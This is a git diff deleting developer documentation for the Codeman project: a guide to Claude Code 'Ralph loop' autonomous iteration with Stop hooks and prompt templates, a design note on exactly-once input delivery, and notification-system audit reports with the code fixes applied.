|
||||
> For large tasks with multiple steps or requiring exhaustive solutions—like code migrations, fixing numerous lint errors, or running complex build scripts—improve performance by having Claude use a Markdown file (or even a GitHub issue!) as a checklist and working scratchpad.
|
||||
|
||||
---
|
||||
|
||||
## Hooks System
|
||||
|
||||
Ralph loops are powered by Claude Code's hooks system. Understanding hooks is essential for customization.
|
||||
|
||||
### Hook Events Reference
|
||||
|
||||
| Event | When | Use Case |
|
||||
|-------|------|----------|
|
||||
| `PreToolUse` | Before tool execution | Validate, modify, or block tool calls |
|
||||
| `PostToolUse` | After tool completes | Provide feedback, run formatters/linters |
|
||||
| `Stop` | When Claude finishes | **Ralph loop control** - block exit, refeed prompt |
|
||||
| `SubagentStop` | When subagent finishes | Control nested loops |
|
||||
| `UserPromptSubmit` | User submits prompt | Add context, validate input |
|
||||
| `SessionStart` | Session begins | Load environment, context |
|
||||
| `SessionEnd` | Session ends | Cleanup, logging |
|
||||
| `PermissionRequest` | Permission dialog shown | Auto-approve/deny |
|
||||
| `PreCompact` | Before compact | Backup, preprocessing |
|
||||
|
||||
### Stop Hook for Ralph Loops
|
||||
|
||||
The Stop hook is the key mechanism:
|
||||
|
||||
```json
|
||||
{
|
||||
"hooks": {
|
||||
"Stop": [
|
||||
{
|
||||
"hooks": [
|
||||
{
|
||||
"type": "command",
|
||||
"command": "./scripts/ralph-stop-hook.sh"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Stop Hook Logic**:
|
||||
1. Check if `.claude/ralph-loop.local.md` exists
|
||||
2. Read `enabled` flag from YAML frontmatter
|
||||
3. Check for `completion-promise` in output
|
||||
4. Check if `iteration >= max-iterations`
|
||||
5. If none match, block exit and refeed prompt
|
||||
|
||||
### Hook Output for Stop Events
|
||||
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
"reason": "Completion promise not found. Restarting iteration."
|
||||
}
|
||||
```
|
||||
|
||||
Or to allow exit:
|
||||
```json
|
||||
{
|
||||
"continue": true,
|
||||
"stopReason": "Completion promise detected"
|
||||
}
|
||||
```
|
||||
|
||||
### Prompt-Based Hooks
|
||||
|
||||
For more sophisticated evaluation, use LLM-based hooks:
|
||||
|
||||
```json
|
||||
{
|
||||
"hooks": {
|
||||
"Stop": [
|
||||
{
|
||||
"hooks": [
|
||||
{
|
||||
"type": "prompt",
|
||||
"prompt": "Check if the task is complete. Context: $ARGUMENTS\n\nRespond with {\"ok\": true} if done, {\"ok\": false, \"reason\": \"...\"} if not.",
|
||||
"timeout": 30
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices
|
||||
|
||||
### 1. Always Set `--max-iterations`
|
||||
|
||||
> This cannot be overstated: always set `--max-iterations`. Autonomous loops consume tokens rapidly. A typical 50-iteration loop on a medium-sized codebase can cost $50-100+ in API usage.
|
||||
|
||||
```bash
|
||||
/ralph-loop:ralph-loop
|
||||
# Then configure: max-iterations=30, completion-promise="DONE"
|
||||
```
|
||||
|
||||
### 2. Define Clear, Measurable Success Criteria
|
||||
|
||||
**Bad**:
|
||||
```
|
||||
Build a todo API and make it good.
|
||||
```
|
||||
|
||||
**Good**:
|
||||
```
|
||||
Build a REST API for todos.
|
||||
|
||||
Completion criteria:
|
||||
- All CRUD endpoints working (GET, POST, PUT, DELETE)
|
||||
- Input validation with error messages
|
||||
- Tests passing with >80% coverage
|
||||
- README with API documentation
|
||||
|
||||
Output <promise>COMPLETE</promise> when ALL criteria are met.
|
||||
```
|
||||
|
||||
### 3. Use Test-Driven Verification
|
||||
|
||||
> The most effective Ralph Loop tasks include built-in verification. This creates a natural feedback loop within the loop.
|
||||
|
||||
```
|
||||
Implement user authentication using TDD:
|
||||
|
||||
1. Write failing tests for each requirement
|
||||
2. Implement feature to make tests pass
|
||||
3. Run tests after each change
|
||||
4. If any fail, debug and fix
|
||||
5. Refactor if needed
|
||||
6. Output <promise>TESTS_PASS</promise> when all tests green
|
||||
```
|
||||
|
||||
### 4. Include Escape Hatches
|
||||
|
||||
```
|
||||
Primary task: Implement feature X
|
||||
|
||||
If stuck after 10 iterations:
|
||||
- Document what's blocking progress
|
||||
- List approaches that were attempted
|
||||
- Suggest alternative approaches
|
||||
- Output <promise>BLOCKED</promise>
|
||||
```
|
||||
|
||||
### 5. Incremental Goals for Large Tasks
|
||||
|
||||
**Bad**:
|
||||
```
|
||||
Create a complete e-commerce platform.
|
||||
```
|
||||
|
||||
**Good**:
|
||||
```
|
||||
Build e-commerce platform in phases:
|
||||
|
||||
Phase 1: User authentication
|
||||
- JWT-based auth
|
||||
- Tests passing
|
||||
- Commit: "feat: add user auth"
|
||||
|
||||
Phase 2: Product catalog
|
||||
- CRUD for products
|
||||
- Search functionality
|
||||
- Tests passing
|
||||
- Commit: "feat: add product catalog"
|
||||
|
||||
Phase 3: Shopping cart
|
||||
- Add/remove items
|
||||
- Persist cart state
|
||||
- Tests passing
|
||||
- Commit: "feat: add shopping cart"
|
||||
|
||||
Output <promise>COMPLETE</promise> when all phases done.
|
||||
```
|
||||
|
||||
### 6. Commit Frequently
|
||||
|
||||
```
|
||||
After each meaningful completion:
|
||||
1. git add .
|
||||
2. git commit -m "descriptive message"
|
||||
|
||||
This creates recovery points and shows progress in git history.
|
||||
```
|
||||
|
||||
### 7. Test Before Long Runs
|
||||
|
||||
> Pro tip: Test manually with one iteration before running 50-iteration loops.
|
||||
|
||||
```bash
|
||||
# Test with 1 iteration first
|
||||
/ralph-loop:ralph-loop
|
||||
# Configure: max-iterations=1
|
||||
|
||||
# Then run full loop
|
||||
/ralph-loop:ralph-loop
|
||||
# Configure: max-iterations=50
|
||||
```
|
||||
|
||||
### 8. Use Git for Safety
|
||||
|
||||
> Always run Ralph loops in a git-tracked directory. If something goes wrong, you can revert. Each iteration adds to git history, giving you a clear trail of what changed.
|
||||
|
||||
---
|
||||
|
||||
## Prompt Templates
|
||||
|
||||
### Template 1: Test-Driven Development
|
||||
|
||||
```markdown
|
||||
# Task: [FEATURE_NAME]
|
||||
|
||||
## Requirements
|
||||
- [Requirement 1]
|
||||
- [Requirement 2]
|
||||
- [Requirement 3]
|
||||
|
||||
## Approach
|
||||
Follow TDD methodology:
|
||||
1. Write failing tests for each requirement
|
||||
2. Implement minimal code to pass tests
|
||||
3. Run tests: `npm test`
|
||||
4. If tests fail, read error, fix, repeat
|
||||
5. When all tests pass, refactor if needed
|
||||
6. Commit: `git add . && git commit -m "feat: [feature]"`
|
||||
|
||||
## Completion
|
||||
Output <promise>TESTS_PASS</promise> when:
|
||||
- All tests pass
|
||||
- Code is committed
|
||||
- No lint errors
|
||||
```
|
||||
|
||||
### Template 2: Migration/Refactor
|
||||
|
||||
```markdown
|
||||
# Task: Migrate from [OLD] to [NEW]
|
||||
|
||||
## Scope
|
||||
Files to migrate: `src/**/*.ts`
|
||||
|
||||
## Migration Steps
|
||||
For each file:
|
||||
1. Update imports
|
||||
2. Replace deprecated patterns
|
||||
3. Run type check: `npx tsc --noEmit`
|
||||
4. If errors, fix them
|
||||
5. Run tests: `npm test`
|
||||
6. Commit: `git commit -m "refactor: migrate [file]"`
|
||||
|
||||
## Completion
|
||||
Output <promise>MIGRATION_COMPLETE</promise> when:
|
||||
- All files migrated
|
||||
- Type check passes
|
||||
- All tests pass
|
||||
- All changes committed
|
||||
```
|
||||
|
||||
### Template 3: Bug Fix
|
||||
|
||||
```markdown
|
||||
# Bug: [BUG_DESCRIPTION]
|
||||
|
||||
## Reproduction
|
||||
[Steps to reproduce]
|
||||
|
||||
## Investigation
|
||||
1. Find the root cause
|
||||
2. Document findings
|
||||
|
||||
## Fix
|
||||
1. Write a failing test that reproduces the bug
|
||||
2. Implement the fix
|
||||
3. Verify test passes
|
||||
4. Check for regressions: `npm test`
|
||||
5. Commit: `git commit -m "fix: [description]"`
|
||||
|
||||
## Completion
|
||||
Output <promise>FIXED</promise> when:
|
||||
- Bug is fixed
|
||||
- Test added to prevent regression
|
||||
- All tests pass
|
||||
```
|
||||
|
||||
### Template 4: Time-Aware Loop
|
||||
|
||||
```markdown
|
||||
# Task: Optimize API performance
|
||||
|
||||
## Primary Goals
|
||||
1. Profile existing endpoints
|
||||
2. Identify bottlenecks
|
||||
3. Implement optimizations
|
||||
4. Verify improvements
|
||||
|
||||
## Duration
|
||||
Minimum runtime: 4 hours
|
||||
|
||||
## Self-Generated Tasks
|
||||
If primary goals complete before 4 hours:
|
||||
- Add caching layers
|
||||
- Optimize database queries
|
||||
- Add request batching
|
||||
- Improve error handling
|
||||
- Add performance tests
|
||||
|
||||
## Completion
|
||||
Output <promise>TIME_COMPLETE</promise> when:
|
||||
- All primary goals achieved
|
||||
- Minimum 4 hours elapsed
|
||||
- All tests pass
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## When to Use (and Not Use)
|
||||
|
||||
### Good Use Cases
|
||||
|
||||
| Use Case | Why It Works |
|
||||
|----------|--------------|
|
||||
| **Large refactors** | Clear mechanical steps, verifiable via tests |
|
||||
| **Framework migrations** | Repetitive patterns, type checking validates |
|
||||
| **Test coverage** | "Add tests for uncovered functions" is measurable |
|
||||
| **Greenfield projects** | Can run overnight, tests verify correctness |
|
||||
| **Batch operations** | Same operation across many files |
|
||||
| **Dependency upgrades** | API changes are well-documented |
|
||||
|
||||
### Poor Use Cases
|
||||
|
||||
| Use Case | Why It Fails |
|
||||
|----------|--------------|
|
||||
| **Ambiguous requirements** | Can't define success criteria |
|
||||
| **Architectural decisions** | Requires human judgment |
|
||||
| **Security-critical code** | Needs human review |
|
||||
| **Production debugging** | Often requires context not in code |
|
||||
| **UX/design decisions** | Subjective, not automatable |
|
||||
| **Exploratory work** | "Figure out why it's slow" has no clear endpoint |
|
||||
|
||||
### Decision Framework
|
||||
|
||||
Ask yourself:
|
||||
1. **Can I define "done" objectively?** (tests pass, lint clean, etc.)
|
||||
2. **Is there automatic verification?** (tests, type checking, linting)
|
||||
3. **Is the task mechanical or creative?** (mechanical = good for Ralph)
|
||||
4. **What's the cost of failure?** (high cost = needs human review)
|
||||
|
||||
---
|
||||
|
||||
## Real-World Examples
|
||||
|
||||
### Example 1: Y Combinator Hackathon
|
||||
- **Task**: Generate multiple repositories overnight
|
||||
- **Result**: 6 repositories generated autonomously
|
||||
- **Key**: Each repo had clear completion criteria
|
||||
|
||||
### Example 2: $50K Contract
|
||||
- **Task**: Large codebase migration
|
||||
- **Result**: Completed for $297 in API costs
|
||||
- **Key**: Well-defined migration patterns, comprehensive tests
|
||||
|
||||
### Example 3: Programming Language (Cursed)
|
||||
- **Task**: "Make me a programming language like Golang but with Gen Z slang keywords"
|
||||
- **Result**: Functional compiler with LLVM backend, standard library, editor support
|
||||
- **Duration**: 3 months of autonomous iteration
|
||||
- **Keywords**: `slay` (function), `sus` (variable), `based` (true)
|
||||
|
||||
### Example 4: React Migration
|
||||
- **Task**: Upgrade from React v16 to v19
|
||||
- **Result**: 14-hour autonomous session, complete migration
|
||||
- **Key**: Clear deprecation warnings, comprehensive test suite
|
||||
|
||||
---
|
||||
|
||||
## Codeman Implementation
|
||||
|
||||
Codeman implements Ralph Wiggum tracking via the `RalphTracker` class in `src/ralph-tracker.ts`.
|
||||
|
||||
### Auto-Detection Patterns
|
||||
|
||||
The tracker automatically enables when detecting:
|
||||
|
||||
| Pattern | Example | Regex |
|
||||
|---------|---------|-------|
|
||||
| Ralph command | `/ralph-loop:ralph-loop` | `/\/ralph-loop\|starting ralph/i` |
|
||||
| Promise tag | `<promise>COMPLETE</promise>` | `/<promise>([^<]+)<\/promise>/` |
|
||||
| TodoWrite | `Todos have been modified` | `/TodoWrite\|todos?\s*(?:updated\|written)/i` |
|
||||
| Iteration | `Iteration 5/50` or `[5/50]` | `/(?:iteration)\s*#?(\d+)(?:\s*[\/of]\s*(\d+))?/i` |
|
||||
| Todo checkbox | `- [ ] Task` | `/^[-*]\s*\[([xX ])\]\s+(.+)$/gm` |
|
||||
| Todo indicator | `Todo: ☐ Task` | `/Todo:\s*(☐\|◐\|✓)/g` |
|
||||
| All complete | `All tasks completed` | `/all\s+tasks?\s+completed?\|all\s+done/i` |
|
||||
| Task done | `Task 8 is done` | `/task\s*#?\d+\s*(?:is\s+)?done/i` |
|
||||
|
||||
### Completion Detection
|
||||
|
||||
Multi-strategy detection to catch various completion signals:
|
||||
|
||||
1. **Tagged phrase**: `<promise>PHRASE</promise>` - First occurrence stores phrase, second triggers completion
|
||||
2. **Bare phrase**: Detects phrase without tags once expected phrase is known (e.g., Claude outputs `COMPLETE` instead of `<promise>COMPLETE</promise>`)
|
||||
3. **All complete signals**: Detects "All X files/tasks created/completed" messages, marks all todos complete and emits completion
|
||||
4. **Explicit task completion**: Matches "Task N is done" patterns
|
||||
|
||||
### Session Lifecycle
|
||||
|
||||
Each session has its **own independent tracker**:
|
||||
|
||||
| Action | Result |
|
||||
|--------|--------|
|
||||
| New session opened | Fresh tracker, no carryover |
|
||||
| Tab closed | Tracker state cleared, UI panel hides |
|
||||
| Switch tabs | Panel shows tracker for active session |
|
||||
| `tracker.reset()` | Clears todos/state, keeps enabled status |
|
||||
| `tracker.fullReset()` | Complete reset to initial state |
|
||||
| `tracker.configure({...})` | Partial config update (enabled, completionPhrase, maxIterations) |
|
||||
|
||||
### State Structure
|
||||
|
||||
```typescript
|
||||
interface RalphLoopState {
|
||||
enabled: boolean; // Tracker active?
|
||||
active: boolean; // Loop running?
|
||||
completionPhrase: string | null;
|
||||
startedAt: number | null;
|
||||
cycleCount: number;
|
||||
maxIterations: number | null;
|
||||
lastActivity: number;
|
||||
elapsedHours: number | null;
|
||||
}
|
||||
|
||||
interface RalphTodoItem {
|
||||
id: string;
|
||||
content: string;
|
||||
status: 'pending' | 'in_progress' | 'completed';
|
||||
detectedAt: number;
|
||||
}
|
||||
```
|
||||
|
||||
### API Endpoints
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| GET | `/api/sessions/:id/ralph-state` | Get loop state and todos |
|
||||
| POST | `/api/sessions/:id/ralph-config` | Configure tracker settings |
|
||||
|
||||
**POST `/ralph-config` Options**:
|
||||
```json
|
||||
{
|
||||
"enabled": true, // Enable/disable tracker
|
||||
"reset": true, // Soft reset (clears state, keeps enabled)
|
||||
"reset": "full", // Full reset (clears everything)
|
||||
"completionPhrase": "DONE" // Set expected completion phrase
|
||||
}
|
||||
```
|
||||
|
||||
**GET Response**:
|
||||
```json
|
||||
{
|
||||
"success": true,
|
||||
"data": {
|
||||
"loop": {
|
||||
"enabled": true,
|
||||
"active": true,
|
||||
"completionPhrase": "COMPLETE",
|
||||
"cycleCount": 5,
|
||||
"maxIterations": 50,
|
||||
"elapsedHours": 2.5
|
||||
},
|
||||
"todos": [
|
||||
{ "id": "todo-abc", "content": "Fix auth", "status": "completed" },
|
||||
{ "id": "todo-def", "content": "Add tests", "status": "in_progress" }
|
||||
],
|
||||
"todoStats": { "total": 5, "pending": 2, "inProgress": 1, "completed": 2 }
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### SSE Events
|
||||
|
||||
| Event | Data | When |
|
||||
|-------|------|------|
|
||||
| `session:ralphLoopUpdate` | `RalphLoopState` | Loop state changes |
|
||||
| `session:ralphTodoUpdate` | `RalphTodoItem[]` | Todos detected/updated |
|
||||
| `session:ralphCompletionDetected` | `{ phrase: string }` | Completion phrase found |
|
||||
|
||||
### Skill Commands
|
||||
|
||||
```bash
|
||||
/ralph-loop:ralph-loop # Start Ralph Loop in current session
|
||||
/ralph-loop:cancel-ralph # Cancel active Ralph Loop
|
||||
/ralph-loop:help # Show help and usage
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Loop Never Completes
|
||||
|
||||
**Cause**: Completion criteria aren't clear enough.
|
||||
|
||||
**Solution**: Be more specific about what "done" means. Include testable criteria:
|
||||
```
|
||||
Output <promise>DONE</promise> when:
|
||||
- `npm test` exits with code 0
|
||||
- `npm run lint` exits with code 0
|
||||
- All files committed
|
||||
```
|
||||
|
||||
### Same Error Every Iteration
|
||||
|
||||
**Cause**: Claude is stuck in a failure loop.
|
||||
|
||||
**Solution**: Add escape hatch to prompt:
|
||||
```
|
||||
If stuck after 10 iterations with the same error:
|
||||
1. Document the error and what was tried
|
||||
2. Suggest alternative approaches
|
||||
3. Output <promise>STUCK</promise>
|
||||
```
|
||||
|
||||
### High API Costs
|
||||
|
||||
**Cause**: Too many iterations, large context.
|
||||
|
||||
**Solutions**:
|
||||
1. Always set `--max-iterations`
|
||||
2. Use `/clear` between major phases
|
||||
3. Keep files small and focused
|
||||
4. Test with 1 iteration first
|
||||
|
||||
### False Completion Detection
|
||||
|
||||
**Cause**: Completion phrase appears in prompt or documentation.
|
||||
|
||||
**Solution**: Use unique, unlikely phrases:
|
||||
```
|
||||
# Bad (might appear in docs)
|
||||
<promise>COMPLETE</promise>
|
||||
|
||||
# Good (unique)
|
||||
<promise>TASK_XYZ_VERIFIED_DONE</promise>
|
||||
```
|
||||
|
||||
### Tracker Not Enabling
|
||||
|
||||
**Cause**: No Ralph patterns detected in output.
|
||||
|
||||
**Solution**:
|
||||
1. Manually enable: `POST /api/sessions/:id/ralph-config { "enabled": true }`
|
||||
2. Or ensure Claude outputs recognizable patterns
|
||||
|
||||
### Context Window Exhaustion
|
||||
|
||||
**Cause**: Long-running loops accumulate context.
|
||||
|
||||
**Solution**: Configure auto-clear:
|
||||
```bash
|
||||
POST /api/sessions/:id/auto-clear
|
||||
{ "enabled": true, "threshold": 140000 }
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
### Official Documentation
|
||||
- [Anthropic Ralph Wiggum Plugin](https://github.com/anthropics/claude-code/tree/main/plugins/ralph-wiggum)
|
||||
- [Claude Code Hooks Reference](https://code.claude.com/docs/en/hooks)
|
||||
- [Claude Code Best Practices](https://www.anthropic.com/engineering/claude-code-best-practices)
|
||||
- [Claude Code Overview](https://code.claude.com/docs/en/overview)
|
||||
|
||||
### Community Resources
|
||||
- [Awesome Claude - Ralph Wiggum](https://awesomeclaude.ai/ralph-wiggum)
|
||||
- [Claude Fast - Autonomous Agent Loops](https://claudefa.st/blog/guide/mechanics/autonomous-agent-loops)
|
||||
- [DeepWiki - Ralph Loop](https://deepwiki.com/anthropics/claude-plugins-official/5.2.2-ralph-loop)
|
||||
|
||||
### Related Codeman Files
|
||||
- `src/ralph-tracker.ts` - Core detection engine
|
||||
- `src/ralph-loop.ts` - Task orchestration
|
||||
- `src/respawn-controller.ts` - Session cycling
|
||||
- `src/spawn-orchestrator.ts` - Autonomous agent lifecycle (uses RalphTracker for completion)
|
||||
- `src/spawn-detector.ts` - Detects `<spawn1337>` tags in terminal output
|
||||
- `src/types.ts` - Type definitions
|
||||
|
||||
---
|
||||
|
||||
*This documentation is maintained as part of the Codeman project. For updates, see the main [CLAUDE.md](../CLAUDE.md).*
|
||||
@@ -1,72 +0,0 @@
|
||||
# Reliable input delivery (exactly-once, durable)
|
||||
|
||||
## The bug this fixes
|
||||
|
||||
With local echo on, pressing Enter cleared the overlay and then sent the prompt
|
||||
over the WebSocket **fire-and-forget** (`ws.send({t:'i',d})`). On a flaky link
|
||||
(e.g. a moving train) the socket is frequently *half-open*: `readyState === OPEN`
|
||||
so `ws.send()` does **not** throw, but the underlying TCP is dead, so the frame is
|
||||
silently discarded. Nothing was enqueued (the send "succeeded"), the on-screen
|
||||
prompt was already wiped, and `navigator.onLine` stays `true` — so a long typed
|
||||
prompt vanished with no trace and no resend.
|
||||
|
||||
## The guarantee
|
||||
|
||||
Every byte of user input is **recorded durably before delivery** and **only
|
||||
dropped once the server ACKs it** — so a half-open socket, a reconnect, or a page
|
||||
reload can never lose input. Redelivery is **exactly-once**: the server applies
|
||||
each `(clientId, seq)` at most once, so a resend can't type the prompt twice.
|
||||
|
||||
## How it works
|
||||
|
||||
### Client (`app.js`)
|
||||
|
||||
- A stable **`clientId`** (`localStorage['codeman:clientId']`) identifies this
|
||||
browser to the server's dedup across reconnects and reloads.
|
||||
- Each input frame gets a **monotonic per-session `seq`**. Frame records
|
||||
(`{seq,data,useMux,ts,tries,sentAt}`) live in `_pendingDeliveries`
|
||||
(`Map<sessionId, record[]>`), persisted (debounced, + flushed on `pagehide`/
|
||||
`visibilitychange`) to `localStorage['codeman:pendingInput']`. The seq counters
|
||||
persist too, so seqs stay monotonic across reloads (never reset — a reset would
|
||||
let the server treat fresh input as an already-applied duplicate).
|
||||
- **Delivery** (`_drainSession`):
|
||||
- **WS path** — when the socket is `OPEN` for the session, send each not-yet-sent
|
||||
record (`sentAt === 0`) in seq order over the single ordered stream. Records
|
||||
stay pending until the server's `{t:'ia',seq}` ACK removes them.
|
||||
- **POST path** — when no WS, POST records in order, awaiting each (the HTTP 2xx
|
||||
*is* the ACK). A 404/410 (session gone) drops the record rather than retry
|
||||
forever.
|
||||
- **Half-open recovery** (`_redeliverSweep`, every 2s): if the active WS session's
|
||||
oldest record is unacked past `_reliableAckTimeoutMs` (4s), the socket is assumed
|
||||
dead — `ws.close()` forces a fast reconnect; `onopen` (`_onWsReady`) resets
|
||||
`sentAt = 0` and re-sends everything pending. Also re-drains background sessions
|
||||
over POST, and fires on SSE-reconnect / `online`.
|
||||
- The connection indicator shows pending count/bytes (`_pendingBytes`).
|
||||
|
||||
### Server
|
||||
|
||||
- **`Session.shouldApplyInput(clientId, seq)`** — returns `true` exactly once per
|
||||
`(clientId, seq)`: the first time a seq strictly greater than that client's
|
||||
last-applied is seen. A replayed/lower seq returns `false`. Bounded MRU map
|
||||
(`MAX_INPUT_DEDUP_CLIENTS = 256`).
|
||||
- **WS route** (`ws-routes.ts`) — parses optional `cid`/`seq` on `{t:'i'}`; applies
|
||||
via `shouldApplyInput` (skips a duplicate, still ACKs with `{t:'ia',seq}` so the
|
||||
client drops it). Untagged frames apply unconditionally (no behavior change).
|
||||
- **POST route** (`/api/sessions/:id/input`) — optional `seq`/`clientId` in
|
||||
`SessionInputWithLimitSchema`; a deduped duplicate returns 200 without writing
|
||||
(the 200 is the client's ACK). `curl`/legacy callers omit the fields and always
|
||||
apply.
|
||||
|
||||
## Known limitation
|
||||
|
||||
Dedup state is in-memory on the server. A **server restart** between a write and
|
||||
the client's redelivery of that same seq could re-apply it (a rare duplicate).
|
||||
This is a deliberate trade-off: favor *never losing input* over a rare duplicate
|
||||
across the narrow restart window.
|
||||
|
||||
## Tests
|
||||
|
||||
- `test/reliable-input-dedup.test.ts` — `Session.shouldApplyInput` exactly-once
|
||||
semantics (monotonic, per-client, gap-tolerant, eviction-safe).
|
||||
- `test/routes/session-routes.test.ts` — POST `/input` applies a tagged
|
||||
`(clientId, seq)` once on redelivery; untagged input always applies.
|
||||
@@ -1,89 +0,0 @@
|
||||
# Notification System Audit - Summary Report
|
||||
|
||||
Date: 2026-02-17
|
||||
|
||||
## Scope
|
||||
|
||||
Full audit of the Codeman notification system covering:
|
||||
- Backend event pipeline (server.ts, hooks-config.ts, team-watcher.ts, subagent-watcher.ts)
|
||||
- Frontend notification manager (app.js NotificationManager class, 4-layer architecture)
|
||||
- Settings UI and persistence (localStorage + server backup)
|
||||
- Blinking/visual alerts (title flash, CSS tab animations, badge pulse)
|
||||
- Desktop vs mobile behavior
|
||||
- Team agent integration
|
||||
|
||||
## Architecture
|
||||
|
||||
4-layer notification system in `NotificationManager` class:
|
||||
1. **In-app drawer** - Sliding panel with badge on bell icon, grouping within 5s windows
|
||||
2. **Tab title flash** - `setInterval` at 1500ms, warning emoji + unread count when tab hidden
|
||||
3. **Browser Notification API** - OS-level notifications, rate-limited 1 per 3s, auto-close at 8s
|
||||
4. **Audio alerts** - Web Audio API 660Hz sine wave beep, 150ms duration
|
||||
|
||||
Separate from NotificationManager: **CSS tab alert system** driven by `pendingHooks` state machine (red blink for action, yellow for idle).
|
||||
|
||||
## Bugs Found & Fixed
|
||||
|
||||
### CRITICAL
|
||||
|
||||
| # | Bug | Fix | Files |
|
||||
|---|-----|-----|-------|
|
||||
| 1 | **Category/EventType key mismatch** - Per-event notification settings (On/Browser/Sound checkboxes) were completely non-functional. `notify()` used categories like `hook-permission` but `eventTypes` keys were `permission_prompt`. Lookup always failed, falling through to legacy urgency-based logic. | Added `categoryToEventType` mapping object in `notify()` method | `app.js:966-984` |
|
||||
| 2 | **Cache invalidation bug** - `broadcast()` checked `event === 'respawn:'` (exact match) but all respawn events are `respawn:stateChanged` etc. Respawn state changes never invalidated cached state. | Changed to `event.startsWith('respawn:')` | `server.ts:4648` |
|
||||
|
||||
### HIGH
|
||||
|
||||
| # | Bug | Fix | Files |
|
||||
|---|-----|-----|-------|
|
||||
| 3 | **`session_error.browser` setting** used wrong checkbox - saved from `eventPermissionBrowser` instead of its own value | Changed to preserve current pref value with fallback | `app.js:9516` |
|
||||
| 4 | **Dead hook events** - `hook:teammate_idle` and `hook:task_completed` broadcast by backend but no frontend handlers | Added SSE listeners with appropriate notifications | `app.js:2924-2950` |
|
||||
| 5 | **`respawn:error` silently dropped** - No frontend handler for respawn errors | Added SSE listener with critical notification | `app.js:2630-2642` |
|
||||
| 6 | **Subagent notifications decorative** - Settings had toggles but no code dispatched notifications | Wired `notify()` calls into subagent:discovered and subagent:completed handlers | `app.js:2989,3107` |
|
||||
|
||||
### MEDIUM
|
||||
|
||||
| # | Bug | Fix | Files |
|
||||
|---|-----|-----|-------|
|
||||
| 7 | **AudioContext autoplay policy** - No `resume()` call, first audio silently fails on browsers with autoplay restrictions | Added `audioCtx.state === 'suspended'` check with `resume()` | `app.js:1191` |
|
||||
|
||||
## What Works Well (No Changes Needed)
|
||||
|
||||
- **Title blinking**: Properly guarded against interval stacking, comprehensive cleanup (onTabVisible, handleInit, markAllRead, clearAll)
|
||||
- **CSS tab alerts**: Pure CSS infinite animations, zero JS timer overhead, correctly wired to pendingHooks state machine
|
||||
- **Notification grouping**: 5s sliding window dedup prevents spam, triple-layered stacking protection
|
||||
- **Mobile/desktop separation**: Separate localStorage keys (`-mobile` suffix), separate defaults (mobile OFF by default)
|
||||
- **Memory cleanup**: Thorough in handleInit (SSE reconnect), removeSession, all timer paths
|
||||
- **Browser notification rate limiting**: Global 3s rate limit with auto-close at 8s
|
||||
- **Visibility API usage**: Correct modern approach (visibilitychange + pageshow for iOS bfcache, no focus/blur)
|
||||
- **Notification drawer UX**: Urgency-colored borders, relative timestamps, click-to-switch-session, slide-in animations
|
||||
|
||||
## Detailed Reports
|
||||
|
||||
| Report | File |
|
||||
|--------|------|
|
||||
| Backend analysis | `reports/notification-backend.md` |
|
||||
| Frontend analysis | `reports/notification-frontend.md` |
|
||||
| Settings flow | `reports/notification-settings.md` |
|
||||
| Blinking/visual alerts | `reports/notification-blinking.md` |
|
||||
|
||||
## Changes Summary
|
||||
|
||||
### `src/web/public/app.js`
|
||||
- Added `categoryToEventType` mapping in `notify()` (lines 966-984)
|
||||
- Added `hook:teammate_idle` SSE handler (lines 2924-2936)
|
||||
- Added `hook:task_completed` SSE handler (lines 2938-2950)
|
||||
- Added `respawn:error` SSE handler (lines 2630-2642)
|
||||
- Wired `subagent:discovered` → `notify()` call (line 2989)
|
||||
- Wired `subagent:completed` → `notify()` call (line 3107)
|
||||
- Fixed `session_error.browser` setting save (line 9516)
|
||||
- Added `AudioContext.resume()` for autoplay policy (line 1191)
|
||||
|
||||
### `src/web/server.ts`
|
||||
- Fixed cache invalidation: `event === 'respawn:'` → `event.startsWith('respawn:')` (line 4648)
|
||||
|
||||
## Known Limitations (Not Addressed)
|
||||
|
||||
- **TeamWatcher is unintegrated** - The class exists in `team-watcher.ts` but is never imported in `server.ts`. Team events (member join/leave, task updates, inbox messages) are not broadcast via SSE. This is a larger feature gap, not a notification bug.
|
||||
- **Browser notification rate limit is global** - A rapid succession of different event types only shows the first browser notification within 3s. This is by design for spam prevention.
|
||||
- **No dynamic favicon** - Tab favicon is static; could be enhanced to show red/orange badge for unread notifications.
|
||||
- **Per-session notification settings** - All notification prefs are global, no per-session customization.
|
||||
@@ -1,489 +0,0 @@
|
||||
# Codeman Notification System - Backend Research Report
|
||||
|
||||
Date: 2026-02-17
|
||||
|
||||
## Executive Summary
|
||||
|
||||
The Codeman notification system is a **multi-layer, event-driven pipeline** that flows from backend event emitters, through SSE broadcasts, to a frontend `NotificationManager` class. The backend itself has no concept of "notifications" -- it broadcasts structured SSE events, and the frontend decides which events warrant user notification (browser notifications, audio alerts, tab title flashing, in-app notification drawer, tab alert badges).
|
||||
|
||||
The system handles ~25 distinct notification-triggering SSE events across 5 categories: hook events, session lifecycle, respawn state machine, Ralph Loop, and UI actions.
|
||||
|
||||
---
|
||||
|
||||
## 1. Server-Side Notification Logic (`src/web/server.ts`)
|
||||
|
||||
### 1.1 The `broadcast()` Method (Line 4646)
|
||||
|
||||
All real-time client communication flows through a single private method:
|
||||
|
||||
```typescript
|
||||
private broadcast(event: string, data: unknown): void {
|
||||
// Invalidate caches on state-changing broadcasts
|
||||
if (event.startsWith('session:') || event === 'respawn:') {
|
||||
this.cachedLightState = null;
|
||||
this.cachedSessionsList = null;
|
||||
}
|
||||
let message: string;
|
||||
try {
|
||||
message = `event: ${event}\ndata: ${JSON.stringify(data)}\n\n`;
|
||||
} catch (err) {
|
||||
console.error(`[Server] Failed to serialize SSE event "${event}":`, err);
|
||||
return;
|
||||
}
|
||||
for (const client of this.sseClients) {
|
||||
this.sendSSEPreformatted(client, message);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Key characteristics:
|
||||
- Serializes JSON once, then writes to all connected SSE clients
|
||||
